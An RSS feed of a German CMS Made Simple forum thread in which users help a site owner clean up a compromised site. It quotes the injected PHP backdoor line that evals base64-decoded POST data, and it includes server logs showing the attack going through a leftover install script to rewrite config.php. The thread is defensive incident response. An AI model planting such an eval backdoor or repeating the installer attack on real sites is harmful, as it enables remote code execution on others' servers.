<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="http://fbb.just4test.de/extern.php?action=feed&amp;tid=4562&amp;type=rss" rel="self" type="application/rss+xml" />
		<title><![CDATA[Informationen für CMS/made simple / Angriff 1&1 Webspace / Upload config.php]]></title>
		<link>http://www.cmsmadesimple.de/forum/viewtopic.php?id=4562</link>
		<description><![CDATA[Die aktuellsten Beiträge in Angriff 1&1 Webspace / Upload config.php.]]></description>
		<lastBuildDate>Wed, 07 Oct 2015 19:15:18 +0000</lastBuildDate>
		<generator>FluxBB</generator>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36728#p36728</link>
			<description><![CDATA[<div class="quotebox"><cite>blizzyx schrieb:</cite><blockquote><div><p>Sämtliche eurer Ratschläge habe ich umgesetzt.</p></div></blockquote></div><p>Falls es weitere Probleme geben sollte - gern wieder. </p><p>Sind immer an einer Verbesserung / Optimierung unserer Tipps interessiert. Nur durch User-Anfragen lässt sich wirklich erkennen, was man noch verbessern kann, auch support-seitig.</p>]]></description>
			<author><![CDATA[dummy@example.com (cyberman)]]></author>
			<pubDate>Wed, 07 Oct 2015 19:15:18 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36728#p36728</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36723#p36723</link>
			<description><![CDATA[<div class="quotebox"><cite>faglork schrieb:</cite><blockquote><div><div class="quotebox"><cite>blizzyx schrieb:</cite><blockquote><div><p>Für alle Interessierten hier ein paar Auszüge aus dem Serverlog. Die Vorgehensweise war immer dieselbe: Aufruf der index.php im Install-Ordner, anschließend Kompromittierung der config.php via Post-Request.</p></div></blockquote></div><br /><p>Was zum Teufel sucht der install Ordner noch auf dem Server?</p><p>Servus,<br />Alex</p></div></blockquote></div><p>Das hatte ich mich auch gefragt.</p><p>Inzwischen ist die Website aus einem früheren Backup heraus wiederhergestellt worden. Sämtliche Versionsverweise sind entfernt und der Installationsordner gelöscht worden. Außerdem wurde das Adminverzeichnis umbenannt und mit einem Verzeichnisschutz versehen. Sämtliche eurer Ratschläge habe ich umgesetzt.</p><p>Jetzt bin ich mal gespannt, ob meine Rechnung an den damaligen Websiteersteller weitergegeben wird <img src="http://www.cmsmadesimple.de/forum/plugins/ezbbc/style/smilies/wink.png" alt="wink" /></p>]]></description>
			<author><![CDATA[dummy@example.com (blizzyx)]]></author>
			<pubDate>Wed, 07 Oct 2015 16:35:37 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36723#p36723</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36722#p36722</link>
			<description><![CDATA[<div class="quotebox"><cite>blizzyx schrieb:</cite><blockquote><div><p>Für alle Interessierten hier ein paar Auszüge aus dem Serverlog. Die Vorgehensweise war immer dieselbe: Aufruf der index.php im Install-Ordner, anschließend Kompromittierung der config.php via Post-Request.</p></div></blockquote></div><br /><p>Was zum Teufel sucht der install Ordner noch auf dem Server?</p><p>Servus,<br />Alex</p>]]></description>
			<author><![CDATA[dummy@example.com (faglork)]]></author>
			<pubDate>Wed, 07 Oct 2015 16:20:14 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36722#p36722</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36716#p36716</link>
			<description><![CDATA[<p>Danke für den Auszug - mir scheint, der Angreifer hatte detailierte Systemkenntnisse <img src="http://www.cmsmadesimple.de/forum/plugins/ezbbc/style/smilies/hmm.png" alt="hmm" /> ... findet sich da irgendwo auf deiner Webseite ein Hinweis auf CMSMS?</p><p>Sollte schnellstmöglich entfernt werden, siehe auch 2.2.3 des Security-Threads - zumal das eingesetzte CMS für den nach Informationen Suchenden so wichtig ist wie die Gasrechnung von vor 5 Jahren.</p>]]></description>
			<author><![CDATA[dummy@example.com (cyberman)]]></author>
			<pubDate>Wed, 07 Oct 2015 13:44:33 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36716#p36716</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36714#p36714</link>
			<description><![CDATA[<p>Für alle Interessierten hier ein paar Auszüge aus dem Serverlog. Die Vorgehensweise war immer dieselbe: Aufruf der index.php im Install-Ordner, anschließend Kompromittierung der config.php via Post-Request.</p><div class="codebox"><pre><code>46.183.218.x - - [19/Aug/2015:18:08:08 +0200] &quot;GET /install/index.php HTTP/1.1&quot; 200 2843 www.######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:18:08:09 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 2098 www.######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:18:08:11 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 - www.######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:18:08:12 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 - www.######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:18:08:12 +0200] &quot;POST /config.php HTTP/1.1&quot; 200 - www.######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:18:08:13 +0200] &quot;GET /version.php?cookie HTTP/1.1&quot; 200 8 www.######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;

[...]

46.183.218.x - - [19/Aug/2015:20:13:05 +0200] &quot;GET /install/index.php HTTP/1.1&quot; 200 2843 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:20:13:05 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 225 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:20:13:06 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 225 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:20:13:06 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 225 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:20:13:07 +0200] &quot;POST /config.php HTTP/1.1&quot; 200 15 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:20:13:07 +0200] &quot;GET /version.php?cookie HTTP/1.1&quot; 200 15 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:20:13:08 +0200] &quot;GET /config.php?cookie HTTP/1.1&quot; 200 15 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;

[...]

46.183.218.x - - [19/Aug/2015:22:43:43 +0200] &quot;GET /install/index.php HTTP/1.1&quot; 200 2843 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:22:43:44 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 225 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:22:43:44 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 225 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:22:43:45 +0200] &quot;POST /install/index.php HTTP/1.1&quot; 200 225 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:22:43:45 +0200] &quot;POST /config.php HTTP/1.1&quot; 200 15 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:22:43:46 +0200] &quot;GET /version.php?cookie HTTP/1.1&quot; 200 15 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;
46.183.218.x - - [19/Aug/2015:22:43:47 +0200] &quot;GET /config.php?cookie HTTP/1.1&quot; 200 15 ######.de &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0&quot; &quot;-&quot;</code></pre></div>]]></description>
			<author><![CDATA[dummy@example.com (blizzyx)]]></author>
			<pubDate>Wed, 07 Oct 2015 12:43:07 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36714#p36714</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36297#p36297</link>
			<description><![CDATA[<p>Dann schau doch mal in den Access-Logs, wann das letzte Mal auf das Install-Script zugegriffen wurde. Mehr Anhaltspunkte gibt es da leider nicht (sofern der Angriff tatsächlich über den Installer kam). Ich bezweifle allerdings, dass Du außer einer IP-Adresse, die zu irgendeinem Server irgendwo ins Ausland führt, etwas genaueres herausfinden wirst. Der Betreiber des Servers muss dann nichtmal der Angreifer gewesen sein. Der könnte auch nur als Proxy gedient haben. Ich gehe einfach mal davon aus, dass ein Angreifer in der Lage sein wird, seine Spuren gut genug zu verwischen.</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Thu, 03 Sep 2015 07:41:29 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36297#p36297</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36296#p36296</link>
			<description><![CDATA[<div class="quotebox"><cite>NaN schrieb:</cite><blockquote><div><p>Ein Angriff erfolgt eigentlich immer gezielt gegen das verwendete System.<br />Man kann eine Lücke in einem System nicht ausnutzen, ohne die Lücke genau zu kennen.<br />D.h. jemand hat bemerkt, dass die Seite mit CMSms betrieben wird und dann eine Anfrage an den Installer gestartet. Da muss nicht mal eine Person dahinter stecken - ein Bot könnte das auch.</p></div></blockquote></div><p>Ich habe die Möglichkeit, mir die Log-Dateien des Servers anzusehen. Gibt es bestimmte – verdächtige – Einträge, auf die ich achten kann? Einträge, womit sich der genaue Zeitpunkt des Hacks feststellen lässt?</p><p>Aktuell besteht der Verdacht, dass die Website gezielt Opfer des Hacks geworden ist. Interessant wäre es herauszufinden, ob man den Angriff auf jemanden zurückfühhren kann. Die Marketingabteilung hat mir nämlich mitgeteilt, dass am Tag vor dem Hack ein dubioses Angebot einer Firma einging, die kostenfreie Websiteanalsen anbietet. Dieses Angebot ist vom Kunden abgelehnt worden.</p>]]></description>
			<author><![CDATA[dummy@example.com (blizzyx)]]></author>
			<pubDate>Thu, 03 Sep 2015 07:29:02 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36296#p36296</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36295#p36295</link>
			<description><![CDATA[<div class="quotebox"><blockquote><div><p>Ist es möglich, dass es sich um einen gezielten Angriff handelt oder spricht eher etwas dafür, dass die Website wie massenhaft andere dem Backdoor zum Opfer gefallen ist?</p></div></blockquote></div><p>Ein Angriff erfolgt eigentlich immer gezielt gegen das verwendete System.<br />Man kann eine Lücke in einem System nicht ausnutzen, ohne die Lücke genau zu kennen.<br />D.h. jemand hat bemerkt, dass die Seite mit CMSms betrieben wird und dann eine Anfrage an den Installer gestartet. Da muss nicht mal eine Person dahinter stecken - ein Bot könnte das auch. </p><p>In dieser Anfrage war PHP-Code enthalten, die der Server einfach ausgeführt hat. Das ist ein Fehler im Installer von CMSms. Dass man den Ordner löschen sollte, ist zwar klar, aber dennoch sollten die Entwickler den Fehler beheben.</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Thu, 03 Sep 2015 07:05:05 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36295#p36295</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36293#p36293</link>
			<description><![CDATA[<div class="quotebox"><cite>blizzyx schrieb:</cite><blockquote><div><p>Wie bereits erwähnt, macht mich stutzig, wie der Angreifer die config.php ohne ausreichenden FTP-Zugang hochladen konnte. Kannst du mir mir das erklären? Ist es möglich, dass es sich um einen gezielten Angriff handelt oder spricht eher etwas dafür, dass die Website wie massenhaft andere dem Backdoor zum Opfer gefallen ist?</p></div></blockquote></div><p>Dafür braucht es unter umständen gar keinen FTP Account sondern einen Backdoor oder eine Sicherheitslücke, die es ermöglicht eine PHP Datei auf den Server zu laden und durch die Ausführung derselben weitere Dateien zu verändern.</p>]]></description>
			<author><![CDATA[dummy@example.com (nockenfell)]]></author>
			<pubDate>Wed, 02 Sep 2015 19:23:59 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36293#p36293</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36292#p36292</link>
			<description><![CDATA[<p>Vielen Dank für den Tipp, sämtliche Passwörter sind bereits durch sichere Passwörter ersetzt worden. Die Website ist offline; den offenbar schadhaften Code habe ich aus den betroffenen Dateien entfernt. Allerdings noch keinen ausreichenden Scan gemacht. Dieser steht noch aus und eher geht die Website nicht ans Netz.</p><p>Zum Hintergrund: die Website ist vor zwei Jahren von einem IT-Dienstleister umgesetzt worden. Ich bin bisher nur für die Pflege von redaktionellen Inhalten vom Auftraggeber ins Boot geholt worden und seit dem Angriff nun mehr dafür zuständig, das Ding schnellstmöglich wieder zum Laufen zu bringen. Demnach kann ich vorerst keine Aussagen darüber treffen, welche Sicherheitsmaßnahmen in der Vergangenheit getroffen worden sind und welche nicht. Dazu kommt, dass ich mit CMSMS bisher noch nicht gearbeitet habe. </p><div class="quotebox"><cite>NaN schrieb:</cite><blockquote><div><p>Diese <em>&quot;harmlose&quot;</em> Zeile führt <em>alles mögliche</em> aus, was in <em>irgendeinem POST-Request</em> gesendet wird.<br />Das ist eine klassische <em>&quot;Backdoor&quot;</em>.</p></div></blockquote></div><p>Hallo NaN,</p><p>ganz großen Dank an dich und die anderen dafür, dass ihr den Verdacht eines Hacks bestätigen konntet. Wie cyberman bereits schrieb, ist auch in meinen Augen 1&amp;1 sicher nicht die beste Wahl, wodurch ich an der Glaubwürdigkeit des Virenscanners gezweifelt hatte. Wie man sieht, zu unrecht.</p><p>Nach Überprüfung der Ordnerstruktur ist mir aufgefallen, dass der /install Ordner inklusive Inhalt vorhanden ist. Da ist bei der Erstellung der Website offensichtlich geschlampt worden?</p><p>Wie bereits erwähnt, macht mich stutzig, wie der Angreifer die config.php ohne ausreichenden FTP-Zugang hochladen konnte. Kannst du mir mir das erklären? Ist es möglich, dass es sich um einen gezielten Angriff handelt oder spricht eher etwas dafür, dass die Website wie massenhaft andere dem Backdoor zum Opfer gefallen ist?</p>]]></description>
			<author><![CDATA[dummy@example.com (blizzyx)]]></author>
			<pubDate>Wed, 02 Sep 2015 17:17:31 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36292#p36292</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36284#p36284</link>
			<description><![CDATA[<p>Zusätzlich auch den Zugang zu deinem Webserver ändern. Such dir ein kompliziertes PW aus!</p><p>Wenn du auch einen ftp-Zugriff installiert hast, diesen löschen und einen komplett neuen mit kompliziertem PW erstellen.</p><p>Das war bei mir vor einigen Jahren der Fall. Da wurde auch immer die config.php geändert. Die Suche ergab Schadcode in einigen Files und in der DB. Alle wurden ersetzt, das admin-verzeichnis umbenannt, Ordner, wo dieser Schadcode auftrat wurden nur mit Leserechten versehen.<br />Danach hatte ich keine solchen Probleme mehr.</p>]]></description>
			<author><![CDATA[dummy@example.com (TeXnik)]]></author>
			<pubDate>Wed, 02 Sep 2015 15:22:18 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36284#p36284</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36282#p36282</link>
			<description><![CDATA[<p>Scheint genau dieses Problem zu sein: <a href="http://forum.cmsmadesimple.org/viewtopic.php?p=323555#p323555" rel="nofollow">http://forum.cmsmadesimple.org/viewtopi … 55#p323555</a></p><p>Existiert dein /install/ Verzeichnis noch? Falls ja, immer unbedingt löschen!</p>]]></description>
			<author><![CDATA[dummy@example.com (Klenkes)]]></author>
			<pubDate>Wed, 02 Sep 2015 12:04:33 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36282#p36282</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36281#p36281</link>
			<description><![CDATA[<p>Das ist definitiv eine Backdoor, und entweder wurde 1&amp;1 gehackt (unwahrscheinlich)&#160; oder dein Webspace (sehr wahrscheinlich).</p><p>Zum Einen müsstest du jetzt herausfinden welche Dateien *noch* infiziert sind. Auf den Virenscanner von 1x1 würde ich mich da jetzt nicht verlassen.</p><p>Am einfachsten geht das mit grep<br /><a href="http://www.linux-fuer-blinde.de/135-0-dateien-durchsuchen-mit-grep.html" rel="nofollow">http://www.linux-fuer-blinde.de/135-0-d … -grep.html</a></p><p> ansonsten</p><p>--&gt; alles per FTP runterladen<br />--&gt; mit Sourcecode-Editor o.ä. alle php-Dateien nach &lt;?php $cookey durchsuchen </p><p>Zuma Anderen musst du natürlich herausfinden wie dein Account gehackt wurde. Sonst wird der ratzfatz wieder gehackt.</p><p>Servus,<br />Alex</p>]]></description>
			<author><![CDATA[dummy@example.com (faglork)]]></author>
			<pubDate>Wed, 02 Sep 2015 11:46:44 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36281#p36281</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36277#p36277</link>
			<description><![CDATA[<div class="quotebox"><blockquote><div><p>Aus diesem Grund kann ich mir durchaus vorstellen, dass 1&amp;1 auch die Codeschnippsel im Header hinzugefügt hat</p></div></blockquote></div><p>Sorry, aber das ist Käse.<br />Der Code kommt definitiv nicht von 1&amp;1. <br />Wenn man danach <a href="https://www.google.de/search?q=+preg_replace%28%22\x23\50\x2e\53\x29\43\x69\145%22&amp;ie=utf-8&amp;oe=utf-8&amp;gws_rd=cr&amp;ei=1qnmVcmyNoGwswGBxa34Ag" rel="nofollow">googelt</a>, findet man auch WordPress Seiten, die mit einem solchen Code infiziert wurden. Und die laufen nicht alle bei 1&amp;1.</p><div class="quotebox"><blockquote><div><p>(sind soweit ich das richtig interpretiere harmlose Cookies?)</p></div></blockquote></div><p><em>Das </em>nennst Du harmlos?</p><div class="codebox"><pre><code>@eval(base64_decode($_POST[$cookey]));</code></pre></div><p>Diese <em>&quot;harmlose&quot;</em> Zeile führt <em>alles mögliche</em> aus, was in <em>irgendeinem POST-Request</em> gesendet wird.<br />Das ist eine klassische <em>&quot;Backdoor&quot;</em>.</p><p>Und wenn sonst nichts verdächtiges in der config.php steht, dann ist dieser Code genau das, was der Virenscanner von 1&amp;1 als einen eben solchen erkannt hat. Und deswegen sperrt er den Zugriff auf diese Datei. Eine vollkommen logische Reaktion. Also muss dieser Code da raus. Dann kannst Du der config.php auch wieder sinnvolle Zugriffsrechte geben.<br />Da Du aber nie sicher sein kannst, ob nicht doch irgendwo noch eine infizierte Datei rumschwirrt, folge lieber @Nockenfells Rat.</p><p>Viel wichtiger ist allerdings die Frage: Wie kommt dieser Code da rein?<br />Diese Frage wird allerdings leider nur sehr schwer zu beantworten sein.</p><p>Hattest Du die <a href="http://www.cmsmadesimple.de/forum/viewtopic.php?id=18" rel="nofollow">Sicherheitstipps </a>umgesetzt?<br />(das TMP Verzeichnis wird nämlich oft vergessen)</p>]]></description>
			<author><![CDATA[dummy@example.com (NaN)]]></author>
			<pubDate>Wed, 02 Sep 2015 08:32:31 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36277#p36277</guid>
		</item>
		<item>
			<title><![CDATA[Re: Angriff 1&1 Webspace / Upload config.php]]></title>
			<link>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36275#p36275</link>
			<description><![CDATA[<div class="quotebox"><cite>blizzyx schrieb:</cite><blockquote><div><p> Aus diesem Grund kann ich mir durchaus vorstellen, dass 1&amp;1 auch die Codeschnippsel im Header hinzugefügt hat (sind soweit ich das richtig interpretiere harmlose Cookies?)..</p></div></blockquote></div><p>Sorry, dass Hinzufügen von Code wäre für mich ein NoGo (und damit ein Kündigungsgrund).</p><p>Dann müssten andere Dateien ja auch diesen “Überwachungsstempel“ haben. </p><p>Vielmehr scheint es, als ob da (wie von nockenfell vermutet) irgendein Script auf chmod 666 “lauert“. Aber wie gesagt - seltsame Empfehlungen seitens 1&amp;1. </p><p>400 oder 444 ist für diese Dateien ausreichend.</p>]]></description>
			<author><![CDATA[dummy@example.com (cyberman)]]></author>
			<pubDate>Wed, 02 Sep 2015 04:55:07 +0000</pubDate>
			<guid>http://www.cmsmadesimple.de/forum/viewtopic.php?pid=36275#p36275</guid>
		</item>
	</channel>
</rss>
